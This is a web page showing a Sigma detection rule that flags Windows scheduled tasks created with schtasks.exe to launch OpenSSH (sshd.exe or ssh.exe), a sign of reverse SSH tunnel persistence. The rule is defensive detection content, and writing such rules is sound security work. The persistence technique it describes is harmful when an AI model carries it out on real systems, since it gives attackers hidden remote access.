Potential SSH Tunnel Persistence Install Using A Scheduled Task

calendar Oct 23, 2025 · attack.privilege-escalation attack.persistence attack.execution attack.t1053.005 attack.command-and-control  ·
Share on: linkedin copy

Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects tasks creating that call OpenSSH, which may indicate the creation of reverse SSH tunnel to the attacker's server.

Sigma rule (View on GitHub)

 1title: Potential SSH Tunnel Persistence Install Using A Scheduled Task
 2id: 2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f
 3status: experimental
 4description: Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects tasks creating that call OpenSSH, which may indicate the creation of reverse SSH tunnel to the attacker's server.
 5references:
 6    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/
 7    - https://www.kroll.com/en/insights/publications/cyber/cactus-ransomware-prickly-new-variant-evades-detection
 8author: Rory Duncan
 9date: 2025-07-14
10tags:
11    - attack.privilege-escalation
12    - attack.persistence
13    - attack.execution
14    - attack.t1053.005
15    - attack.command-and-control
16logsource:
17    product: windows
18    category: process_creation
19detection:
20    selection_img:
21        - Image|endswith: '\schtasks.exe'
22        - OriginalFileName: 'schtasks.exe'
23    selection_cli_sshd:
24        CommandLine|contains|all:
25            - ' /create '
26            - 'sshd.exe'
27            - '-f'
28    selection_cli_ssh:
29        CommandLine|contains|all:
30            - ' /create '
31            - 'ssh.exe'
32            - '-i'
33    condition: selection_img and 1 of selection_cli_*
34falsepositives:
35    - Unknown
36level: high

References

Related rules

to-top